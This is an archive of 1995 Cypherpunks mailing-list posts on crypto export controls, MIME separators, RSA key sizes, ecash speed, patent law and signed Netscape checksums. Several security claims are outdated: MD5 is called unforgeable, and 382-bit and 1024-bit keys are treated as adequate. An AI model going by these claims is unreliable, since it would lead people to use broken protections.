that they are exporting software are actually removing a defense against
charges of export.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Nov 1995 20:54:35 +0800
To: cypherpunks@toad.com
Subject: Coding-Export Limits Opposed
Message-ID: <199511091239.HAA07833@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, November 9, 1995, p. D4. 


   Coding-Export Limits Opposed

   The political right has joined the opposition to the
   Clinton Administration's proposed restriction on the export
   of data-coding systems.

   A group of 12 conservative organizations -- including the
   National Rifle Association, Americans for Tax Reform and
   the Competitive Enterprise Institute -- sent a letter
   yesterday to House Speaker Newt Gingrich protesting
   Administration efforts to limit the export of cryptographic
   software and hardware.

   Calling the proposal anti-consumer, anti-business and
   anti-progress, the groups urged Mr. Gingrich to support the
   relaxation of export controls. "The Administration's
   approach is the wrong policy for today's marketplace," the
   letter stated.

   The letter to Mr. Gingrich followed one sent on Tuesday to
   Vice President Al Gore from 37 corporate and publicpolicy
   groups, including the Microsoft Corporation and America
   Online Inc. The letter to Mr. Gore opposed Administration
   efforts to strike a compromise that would limit the
   strength of encryption software exports and require an
   escrowed code-key system, which would contain trapdoor
   access for American law enforcement agencies.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 13 Nov 1995 20:42:41 +0800
To: scottst@ionet.net
Subject: Re: Pegasus Mail
Message-ID: <9511091252.AA04699@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I sure hope some tells David Harris that his program is now export
controlled.  From my reading of his message, it seemed like he thinks he
"beat the system" because he didn't include actual crypto code.

Software that says "plug your own crypto here" is considered an anciliarry
device according to the ITAR.  Or, as I heard some NSA people call it,
"the classic 'crypto with a hole'."  Seems kinda silly that the hole is
the crypto, but hey that anciliiary device clause, you just gotta love
it.

If Pegasus mail were written to support generic user-loadable content
transforms, that would be different.  But even then, you have to be careful
how that's done.  If just did some global search-and-replace and came up
with "keyed compression" you wouldn't get past anyone.  But if you had an
opaque state block that the user modules could set/use/clear, and you
passed that along with your in/out buffers, then you'd be safe.  Of course,
they'd know what is really going on, but are powerless to prevent it.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Fri, 10 Nov 1995 00:43:57 +0800
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
Message-ID: <v03003b18acc7d3c77b54@[204.118.88.32]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:56 AM 11/9/95, Laurent Demailly wrote:
>I've waited a bit, but as nobody seem to have pointed out, you can
>definitly find a unique stream in a *single* pass (but maybe what you
>really want is no pass at all ?)

	engineering versus math.

	you can do it in zero passes, sort of.

	Generate a heafty pseudorandom number and convert it to a heafty
ascii string.  What are the odds that that string will appear in ANY kind
of data you are generating?  Low.  Measured in years and probably decades.

	As you do the mime encapsulation, also scan for a collision.  When
you get it (once every 20 years or so), abort the processing and start over.

d/

--------------------
Dave Crocker                                                +1 408 246 8253
Brandenburg Consulting                                fax:  +1 408 249 6205
675 Spruce Dr.                                     dcrocker@brandenburg.com
Sunnyvale, CA  94086 USA                         http://www.brandenburg.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 22:34:33 +0800
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511090147.RAA31271@kiwi.cs.berkeley.edu>
Message-ID: <199511091413.JAA15288@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Raph Levien writes:
> > I think you are fine if the odds of corrupting the message are less than 
> > the odds of getting hit by a a falling meteor while running the program. 
> > In general there is little point in making any one part of the system 
> > many orders of magnitude more reliable than any other part.
> 
> I agree entirely. That's why my PGP key at school is 382 bits. It's a
> lot easier to compromise my machine than factor a 382 bit number.

On the other hand, it costs nothing by most people's standards to use
a 1024 bit key, so why not use one? I find that there is only a point
in using low security for anything in particular when there is a
perceivable cost to it -- if the cost is typing a different number
while doing key generation, I don't see why one should suffer the
tradeoff.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Fri, 10 Nov 1995 02:10:07 +0800
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
In-Reply-To: <9511091356.AA09725@hplyot.obspm.fr>
Message-ID: <199511091715.JAA12871@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Raph Levien writes:
>  >    On an unrelated topic... cypherpunks like to count bits, right?
>  > What is the correct number of pseudorandom bits to use in a MIME
>  > multipart separator? If the data has a line which matches the
>  > separator, the message is corrupted. Of course, if you can take
>  > multiple passes through the data, you can simply verify that it does
>    ***************
> No need !
>  > not contain a line which matches the separator. But if you're
>  > restricted to a single pass, then the only way to do it is to use a
>  > randomly generated separator.
> I've waited a bit, but as nobody seem to have pointed out, you can
> definitly find a unique stream in a *single* pass (but maybe what you
> really want is no pass at all ?)
> {you add a new random byte each time you find your sequence in the
> stream, and goes forward (as the previous separator was not in the
> "past" of the stream, you don't need to go back)}

Yes, that's a good strategy _if_ you're able to take multiple passes.
However, the separator must (of course) appear at the top of the multipart
message being assembled. Perhaps we don't agree on what "single pass"
means; I meant you could do the processing in a Unix pipe without
requiring storage proportional the size of the data.

> What am I missing ? (anyway, see below)
> (I hope my answer is not as clueless as the "A-dice anonymous" one)

Not quite. As they say, "A-dice" is not merely clueless, but actually
clue-resistant.

>  >    I figure that 128 bits should _definitely_ be enough (that's what
>  > is in the new premail code now). Even 64 bits should ensure that it is
>  > unlikely that anyone will ever experience message corruption over the
>  > expected lifetime of premail. However, it makes me nervous. What do
>  > people think?
> 
> Isn't PGP encoded stream containing only base64 chars ? Why not use
> "====PGP part #===="  (as you can't have more than 2 = in a base 64,
> and only at the end anyway)
> or "@PGP part #" or whatever starting with a non base64 char ?

For PGP encrypted messages, I just use "+" as the boundary, as it is
guaranteed that a valid PGP/MIME multipart/encrypted message body will
never include the line "--+" or "--+--". For the longer separators, my
concern is multipart/signed messages.

> so "@" = 8 bits is my anwser, do I win ;-) ?

I chose "+" instead of, say, "@" because it will survive EBCDIC gateways.
You might argue that this is worrying too much, but doing the right thing
here costs nothing, and may actually save somebody some trouble.

Raph






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Fri, 10 Nov 1995 02:20:49 +0800
To: perry@piermont.com
Subject: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091413.JAA15288@jekyll.piermont.com>
Message-ID: <199511091725.JAA17620@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> > I agree entirely. That's why my PGP key at school is 382 bits. It's a
> > lot easier to compromise my machine than factor a 382 bit number.
> 
> On the other hand, it costs nothing by most people's standards to use
> a 1024 bit key, so why not use one? I find that there is only a point
> in using low security for anything in particular when there is a
> perceivable cost to it -- if the cost is typing a different number
> while doing key generation, I don't see why one should suffer the
> tradeoff.

Perhaps it costs you "nothing," Perry, but not all of us have the
massively parrallel 64-way interleaved banked memory nanosecond-latency
box you have on your desk.

Since RSA decryption is cubic in key size, it takes about twenty times
as long to sign or decrypt a message. Since latency-hiding (for example,
caching the decrypted session keys) is not widely implemented, the user
actually sees the difference.

For applications such as remailers, a 20-fold factor can make the
difference between smooth operation and totally hosing the machine.

Another reason to use small keys is to communicate the relative insecurity
of the machine to senders. A 382-bit key says, loud and clear, "don't send
sensitive or incriminating information using this key."

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 22:49:39 +0800
To: Phil Karn <karn@qualcomm.com>
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com>
Message-ID: <199511091430.JAA15324@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karn writes:
> >I don't know.  Maybe the right thing to do is require conforming
> >implementations to support a large modulus but include recommended
> >smaller moduli.  Then Alice can always force Bob to use the large
> >modulus but, if both agree, they can use something smaller from the
> >standard or even their own home-grown modulus.
> 
> Thanks. That's pretty much what we are doing -- requiring a particular
> 1024-bit modulus but recommending several others as options.

I think Brian is also suggesting that it would be good if people could
negotiate new and previously unheard of modulii if they wanted to.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 22:56:30 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: ecash speed
In-Reply-To: <199511090508.VAA05884@jobe.shell.portal.com>
Message-ID: <199511091441.JAA15345@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal writes:
> "Perry E. Metzger" <perry@piermont.com> writes:
> 
> >Hal writes:
> >> The point is that if the anonymity afforded by ecash is too costly in
> >> terms of time, then we may end up stuck with a non-anonymous system
> >> simply because that is the only one efficient enough to work.  It would
> >> be good to find out if that is a serious problem.
> 
> >I suspect that as CPU speed exponentiates this will become less and
> >less of a problem. It doesn't especially worry me.
> 
> Consider, though, what happens in the current ecash system if it were
> used to charge a penny per page.
[Describes lots of steps...]

I'm really not that convinced that this is a problem in either
direction. With users everywhere on the net connected via
multi-megabit per second links, high speed CPUs, etc, a few extra TCP
connections and RSA operations really might not be noticed in a half
dozen years.

> This all has to happen whenever you click on a link in your browser.
> Even with fast CPU's I think the extra step of connecting to the bank,
> having it check against all coins, and getting approval will be
> considerable for each link traversal.

Again, I'm not convinced either way. I believe we have to wait and see
how fast things really are in practice.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Nov 1995 02:34:18 +0800
To: cypherpunks@toad.com
Subject: New patent rules
Message-ID: <199511091751.JAA15752@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Reading the latest Foresight Update articles in the sci.nanotech newsgroup,
I came upon an analysis of upcoming changes to the patent laws.  With
the signing of the GATT treaty the laws will change next year.  here
is one of the changes, quoting from the article:

    Infringement. Present U.S. patent law grants to a patent
    holder the right to exclude others from making, using, or selling the
    patented invention in the United States.  After about January 1, 1996,
    a patent holder has the right to exclude others also from offering for
    sale patented products or products made using a patented process.
    Thus, under the law as amended, the mere offer for sale of a patented
    product may be treated as an infringing act.  In addition, it will be
    illegal to import a product covered by a U.S. patent.

At first I thought this would not have much impact on crypto software,
which is of course heavily patented.  The current laws already prevent
people from making, using, or selling software which uses patented
algorithms.  The new restrictions on products made using a patented
process would not seem to be relevant.

But there is a possible interpretation which would be very significant.
What if data which has had cryptographic transformations applied were
viewed as a product of a possibly patented process?  An RSA-signed or
-encrypted message might then be such a product.  A blinded coin or other
credential, a key signature or certificate, virtually all of the things
we are interested in could be thought of in those terms.

We have occasionally discussed setting up offshore servers and such to
perform patented cryptographic algorithms.  But if the resulting data
is itself illegal to import, that would make this strategy much more
difficult.  Would it become illegal to "import" messages from
non-RSAREF versions of PGP, or to hand someone a Chaum-type cash token
issued by an offshore bank in a jurisdiction where his patents don't
apply?

I wonder if the lawyers on the list have any thoughts about whether such
an interpretation of the GATT rules is likely to stand.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Thu, 9 Nov 1995 23:15:04 +0800
To: cypherpunks@toad.com
Subject: Re: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <9511090956.ZM2558@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 9,  7:52am, Rich Salz wrote:
> Subject: Re: Pegasus Mail
> I sure hope some tells David Harris that his program is now export
> controlled.  From my reading of his message, it seemed like he thinks he
> "beat the system" because he didn't include actual crypto code.
Hm. David Harris lives in New Zealand.

This makes him a very good man to be writing mail software. Also makes
Pegasus Mail our local software of choice. (We use it at school.) That
it now has hooks for external encryption packages is very good news.

richard
--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 10 Nov 1995 03:04:46 +0800
To: cypherpunks@toad.com
Subject: checksums for Netscape Navigator 2.0 Beta 2
Message-ID: <199511091816.KAA04865@ghoti.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

  This file contains checksums for the Netscape Navigator 2.0 Beta 2
distribution files that are available on the Netscape ftp
site under the directory ftp://ftp.netscape.com/2.0beta/.  This file
has been digitally signed using PGP to assure its authenticity.  The
version of PGP which was used to create the digital signature
on this document was obtained from http://bs.mit.edu:8001/pgp-form.html/.

  This file was signed using my personal PGP key.  My PGP public key, which
can be used to verify the signature on this file, can be obtained from
my web page using this URL:

	http://home.netscape.com/people/jsw/my-pgp-key.txt

or by searching for 'jsw@netscape.com' from the PGP key server at mit:

	http://www-swiss.ai.mit.edu/~bal/pks-commands.html#extract

  There are three sets of checksums in this file.  The first set of
checksums uses MD5 to create 128-bit checksums that can not be forged.
The second and third sets of checksums were generated using the two
forms of the unix 'sum' command.  The 'sum' command creates a 16-bit
checksum, which can be used detect accidental corruption during download,
but is too small to protect you from malicious tampering.

  There are two version of the checksums for the unix 'sum' command because
unix vendors follow two different standards.  I have labeled the
checksums with the systems that they are good for.  If you are performing
the checksum operation on a unix system that is not listed, check both
lists and make sure that one matches.  Note that some Sun systems have
both versions of the sum command, so the results you get will depend
on your shell PATH variable.

	--Jeff

========================================================

These MD5 checksums were generated with the 'md5sum' program from the PGP2.6.2
distribution, which was obtained from http://bs.mit.edu:8001/pgp-form.html/.

f4624a2afa4fbab3b91df62a9c9ebe71  unix/netscape-v20b2-export.alpha-dec-osf2.0.tar.Z
0039da76358854a8dbf81297f8695aa4  unix/netscape-v20b2-export.hppa1.1-hp-hpux.tar.Z
cbf1b480f74cd0f3545184f441670a81  unix/netscape-v20b2-export.i386-unknown-bsd.tar.Z
b5e27641d344cafb15711ccabd02aa62  unix/netscape-v20b2-export.i486-unknown-linux.tar.Z
cb22244b63c4b1f0a484a10a2bed3059  unix/netscape-v20b2-export.mips-sgi-irix5.2.tar.Z
160a862a2628a80dd68a9cccccb1a938  unix/netscape-v20b2-export.rs6000-ibm-aix3.2.tar.Z
2b90a96e95f28867b62d037df4e98c9d  unix/netscape-v20b2-export.sparc-sun-solaris2.3.tar.Z
4352513f5672c7292bf2d47a2bb61ecd  unix/netscape-v20b2-export.sparc-sun-solaris2.4.tar.Z
faaebbbc60565fbe9ab6d36b22dfc375  unix/netscape-v20b2-export.sparc-sun-sunos4.1.3_U1.tar.Z
d6641fbd95fcf5b27b5f07766f688f3a  mac/netscape-2.0b2.hqx
00949f13e3b663dbe8cce6da3be2c39a  windows/n1620b2a.exe
06c3e13f81bc3086c3a49b4268718d2a  windows/n32e20b2.exe

========================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on Sun, SGI IRIX and HPUX systems.

61292 4184 unix/netscape-v20b2-export.alpha-dec-osf2.0.tar.Z
1449 6837 unix/netscape-v20b2-export.hppa1.1-hp-hpux.tar.Z
18430 4342 unix/netscape-v20b2-export.i386-unknown-bsd.tar.Z
36543 4298 unix/netscape-v20b2-export.i486-unknown-linux.tar.Z
39565 4718 unix/netscape-v20b2-export.mips-sgi-irix5.2.tar.Z
37161 3554 unix/netscape-v20b2-export.rs6000-ibm-aix3.2.tar.Z
49003 5273 unix/netscape-v20b2-export.sparc-sun-solaris2.3.tar.Z
2638 3733 unix/netscape-v20b2-export.sparc-sun-solaris2.4.tar.Z
7356 10974 unix/netscape-v20b2-export.sparc-sun-sunos4.1.3_U1.tar.Z
26809 5065 mac/netscape-2.0b2.hqx
26811 4017 windows/n1620b2a.exe
59280 5512 windows/n32e20b2.exe

========================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on Sun, DEC OSF/1, AIX, BSDI, and
Linux systems.

62443  2092 unix/netscape-v20b2-export.alpha-dec-osf2.0.tar.Z
61292  3419 unix/netscape-v20b2-export.hppa1.1-hp-hpux.tar.Z
61270  2171 unix/netscape-v20b2-export.i386-unknown-bsd.tar.Z
06430  2149 unix/netscape-v20b2-export.i486-unknown-linux.tar.Z
23707  2359 unix/netscape-v20b2-export.mips-sgi-irix5.2.tar.Z
36711  1777 unix/netscape-v20b2-export.rs6000-ibm-aix3.2.tar.Z
60075  2637 unix/netscape-v20b2-export.sparc-sun-solaris2.3.tar.Z
22223  1867 unix/netscape-v20b2-export.sparc-sun-solaris2.4.tar.Z
13909  5487 unix/netscape-v20b2-export.sparc-sun-sunos4.1.3_U1.tar.Z
16389  2533 mac/netscape-2.0b2.hqx
38581  2009 windows/n1620b2a.exe
58788  2756 windows/n32e20b2.exe

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKJFGKwWZfp0yzT1AQGxagP+I81vOCxoKOiqo6oJOYs4YeySjz1Yli9d
LmdEXJ6FIsFeiPMws8nTirH3NFNGMSp2jlmfs4ySCh0v4w6xwbZFUpNldnMz0N5c
IBUFi5Xcv5qF1aNezkkDVGkFJLfNTuVmXm3LChr1kxVifcsM52vLJis6QzgkwGCT
RTs0G3Xwo5s=
=1b+c
-----END PGP SIGNATURE-----
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 9 Nov 1995 23:29:02 +0800
To: rsalz@osf.org (Rich Salz)
Subject: Re: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <199511091518.KAA08137@homeport.org>
MIME-Version: 1.0
Content-Type: text


I sure hope no one does.  The ITARs seem to contain a 'scienter'
requirement; that you must know (or have a reasonable idea) that you
are breaking them for it to be criminal.  If he thinks he's ok, he is
until someone tells him otherwise.

	I am not a lawyer.  That is not legal advice.  Go consult a
good ITAR attorney if you want to try that at home. :)

Rich Salz wrote:

| I sure hope some tells David Harris that his program is now export
| controlled.  From my reading of his message, it seemed like he thinks he
| "beat the system" because he didn't include actual crypto code.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 02:24:19 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
Message-ID: <acc774f813021004a77a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:58 PM 11/9/95, Beavis B. Thoopit wrote:

>Does there exist a storage device that, due to _dynamics_ (or other
>factor), prevents the total contents being read in one instance?
>
>Bubble memory device?  Torsion wire memory device?

"All crypto is economics."

There's a literature of sorts on "tamper-resistant modules," or
"tamper-responding modules." Chips or packages that either resist tampering
(= reading, opening, etc.) or that give indication they have been read,
opened, or otherwise accessed.

"Quantum cryptography" aims at providing a "read only once" system. Consult
the vast number of articles and comments available.

Basically, any secret stored in (traditional) hardware can be gotten with
enough money. The issue is the amount of money it takes, and how many
tries, to open the hardware.

(And it may take a lot. Or destroy a lot of chips in the process. The
similarities to bomb disposal are obvious: it may be _possible_ to disarm a
bomb, but a lot of "learning" is likely to take place first.)

Search the archives if you wish for previous articles I and others have
written on reverse-engineering chips with electron beam probes, for
example.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 02:27:13 +0800
To: cypherpunks@toad.com
Subject: Caching Cash (ecash speed)
Message-ID: <acc7778214021004402c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:14 AM 11/9/95, Bill Stewart wrote:

>For penny-a-page on-line services, unless ecash transaction costs are
>_radically_
>cheap, it probably makes more sense for the service to sell its own tokens,
>bought with (anonymous or non-anonymous) ecash, which you then trade for pages.
>No calculation required, just an on-line lookup for double-spending
>and you don't get your page if you double-spend.  An alternative to them
>picking the token numbers is for you to give them the numbers and them
>to keep them in their database, but that's probably unlikely to be done
>and doesn't really buy you much privacy.
>
>If that's not anonymous enough for you (because your IP address could be
>traced when you buy the tokens, and coordinated with them later),
>use a packet laundry, or connect from your dialup access provider,
>which will tell the newspaper you're port43.server29.netcom.com or
>something equally uninformative; or dial in from the public library or cafe.

Tokens, coupons, gift certificates, etc., are all good examples of
_caching_. As, looked at in a certain way, ordinary folding or jangling
cash is an example of caching. (Yes, quibblers, it is true that we view
folding money as "real money," but really it's a series of claims against
some store of value, formerly gold and silver, and now...?)

Instead of constant interactions with a bank, we place money in "cash
memory" (I mean, "cache memory").

The concerns Hal raises about ecash speed are important. CPU speeds are not
the problem, network speeds are---many home and small business users have
very fast CPUs, able to funtion as Web servers all by themselves, but have
relatively slow network connections.

So, various schemes for reducing the network bottlenecks will be likely.

Tokens are a good example. And as Bill notes, token laundries can make them
_effectively_ untraceable, good enough for many of the low-value
transactions for which they are intended. (As usual, more security means
more computation, more delay, all other things being equal.
"TANSTAAFL"--There Ain't No Such Thing As A Free Lunch.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 10 Nov 1995 03:38:57 +0800
To: cypherpunks@toad.com
Subject: Re: Caching Cash (ecash speed)
Message-ID: <199511091850.KAA12286@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 11/9/95 -0800, Timothy C. May wrote:
>The concerns Hal raises about ecash speed are important. CPU speeds are not
>the problem, network speeds are---many home and small business users have
>very fast CPUs, able to funtion as Web servers all by themselves, but have
>relatively slow network connections.

Tim is of course right that network speeds are the problem.  However, the
network limit is the speed of light and not current network technology.  If
your bank is half-way around the world, the 1/7 second round trip will kill
any chance you have of offering 1/10 second response time.

For some thinking on the subject of caching cash, see the "Digital Silk
Road" paper accessable through the Agorics home page:
http://www.webcom.com/~agorics/

BTW - I don't think we should be talking about a penny/page cost because it
is way too high for the current market.  For example, my copy of Applied
Cryptography V2 cost about $.067/page AND came with the media to keep it
"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
also came with the media.  I would think that somewhere between 1/100 to
1/10 of a penny/page is closer to the current market value of the page
content.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Fri, 10 Nov 1995 00:23:00 +0800
To: shields@tembel.org (Michael Shields)
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <47m82v$4p4@yage.tembel.org>
Message-ID: <199511091558.KAA00768@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


I have not yet convinced myself that a time-release information device
is impossible....

Does there exist a storage device that, due to _dynamics_ (or other
factor), prevents the total contents being read in one instance?

Bubble memory device?  Torsion wire memory device?

Back at IBM, an old school customer engineer friend of mine used to
bring in relics of IBM's illustrious past.  One curious device was a
memory device for an old terminal.  This device consisted of about
10 feet of piano wire coiled into a spiral of about 6 inches diameter.
An acuator would "twist" torsion waves onto the end of the wire.
These waves would propagate down the wire and would be sensed falling
off the opposite end.  About 400+ bits could be stored on the wire by
twisting (cwise/0 or ccwise/1) them onto one end, sensing them as
they came off, and re-twisting them back on.  The bits chased each
other around this loop.

Assume that I can only read the bits as they fall off the end (one
bit at a time).
Assume a transformation function (with state) in the middle of the
"wire" which cryptographically transforms the bits.
Assume a device that holds 2^somewhatbig bits.
Assume a traversal delay around the device of 1 unit.
Assume disturbing the device ("grabbing the wire") destroys the information.
Assume the message sender loads the wire with an "encrypted" message.

Can I precompute a message that after N iterations around the "wire"
(and through the transform) will spill out plaintext (N time units
into the future)?
Does such a tranformation exist?  (rings of the technology in S/key...)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Staedeli" <scottst@ionet.net>
Date: Fri, 10 Nov 1995 02:17:29 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re:  Pegasus Mail 2.20
Message-ID: <199511091727.LAA14980@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain


> From:          Rich Salz <rsalz@osf.org>
> Date:          Thu, 9 Nov 1995 07:50:44 -0500
> To:            scottst@ionet.net
> Subject:       Re:  Pegasus Mail 2.20
> Cc:            cyperphunks@osf.org

> I sure hope some tells David Harris that his program is now export
> controlled.  From my reading of his message, it seemed like he thinks he
> "beat the system" because he didn't include actual crypto code.
> 
> Software that says "plug your own crypto here" is considered an anciliarry
> device according to the ITAR.  Or, as I heard some NSA people call it,
> "the classic 'crypto with a hole'."  Seems kinda silly that the hole is
> the crypto, but hey that anciliiary device clause, you just gotta love
> it.
> 
> If Pegasus mail were written to support generic user-loadable content
> transforms, that would be different.  But even then, you have to be careful
> how that's done.  If just did some global search-and-replace and came up
> with "keyed compression" you wouldn't get past anyone.  But if you had an
> opaque state block that the user modules could set/use/clear, and you
> passed that along with your in/out buffers, then you'd be safe.  Of course,
> they'd know what is really going on, but are powerless to prevent it.
> 	/r$
> 

   Actually, David Harris is a citizen of New Zealand. If the US government 
tries anything, at least we'll know if ITAR applies to foreign written 
freeware.
--scottst@ionet.net------http://www.ionet.net/~scottst--
   >~<^xXx       | "The Internet is simply a means of 
        xX   #   | communication. Efforts to stop infor-
      (XXX) #    | mation by enjoining it are doomed to
    (XXXXXXX)    | failure in a free society."
DON'T TREAD ON ME|        -- Prof. Frank Tuerkheimer
========================================================
=========NSA trip phrase of the week: DEUTERIUM=========




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mclow@owl.csusm.edu
Date: Fri, 10 Nov 1995 04:30:29 +0800
To: "From:  Marshall Clow" <mclow@owl.csusm.edu>
Subject: New address
Message-ID: <v03003b0eacc805abfe1d@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


Everyone --

This morning, without any warning, the local university decided to change
all their mail aliases. Mail sent to "mclow@coyote.csusm.edu" now bounces,
and the new address is "mclow@mailhost2.csusm.edu".

Please update your address books.
Sorry about that :-(

P.S. Those of you who send mail to Laurie, her email address is now
	"lclow@mailhost2.csusm.edu"

-- Marshall

Marshall Clow
Aladdin Systems
mclow@mailhost2.csusm.edu
Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 10 Nov 1995 01:10:17 +0800
To: Armadillo Remailer <cypherpunks@toad.com
Subject: Re: Worth of Crypto Consulting
In-Reply-To: <199511090735.BAA01846@monad.armadillo.com>
Message-ID: <9511091650.AA22280@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I was wondering what "real" crypto consultants are getting these days.

I know some people who charge $500 a day and others who charge $5000
It basically depends on reputation and knowledge.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 10 Nov 1995 05:45:32 +0800
To: cypherpunks@toad.com
Subject: Re: Many Topics are Appropriate for Discussion Here
Message-ID: <199511092020.MAA28155@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 Nov 1995, Perry E. Metzger wrote:

>Timothy C. May writes:
>> Implying that the reason Bellovin and Karn left the list--if they did, as I
>> haven't checked--was because of "off-topic" posts seems to be a stretch.
> 
>They both left because the noise level was too high and the
>cryptography content too low. I'll ask Steve to comment if you insist.

I'd be interested as to whether or not they are tuned in here, either
directly or indirectly through some type of list reflector/filter.  Some
people might just read this list and not post.  They may not have anything
to say or contribute, or maybe they just don't want to add to list noise,
but hopefully they do keep up with the mailing list discussion as a first
priority. 

Just because someone doesn't post, doesn't mean that they've left, or not
listening.  It just means that we aren't hearing from them. 

Steve Bellovin, (if this is the AT&T, Steve Bellovin) has corresponded
with me.  He wrote me about the security flaw in Netscape I detailed to
this list, so I can assume from that, that he IS aware of it and is still
aware of the list (if it is the AT&T Steve Bellovin, I mean).  If not, my
mistake. 

I suppose I could ask him whether he is reading this list, or not.

Is Steve AT&T's Security Officer or something?  He never really introduced
himself when he emailed me, and he never presented me with any credentials
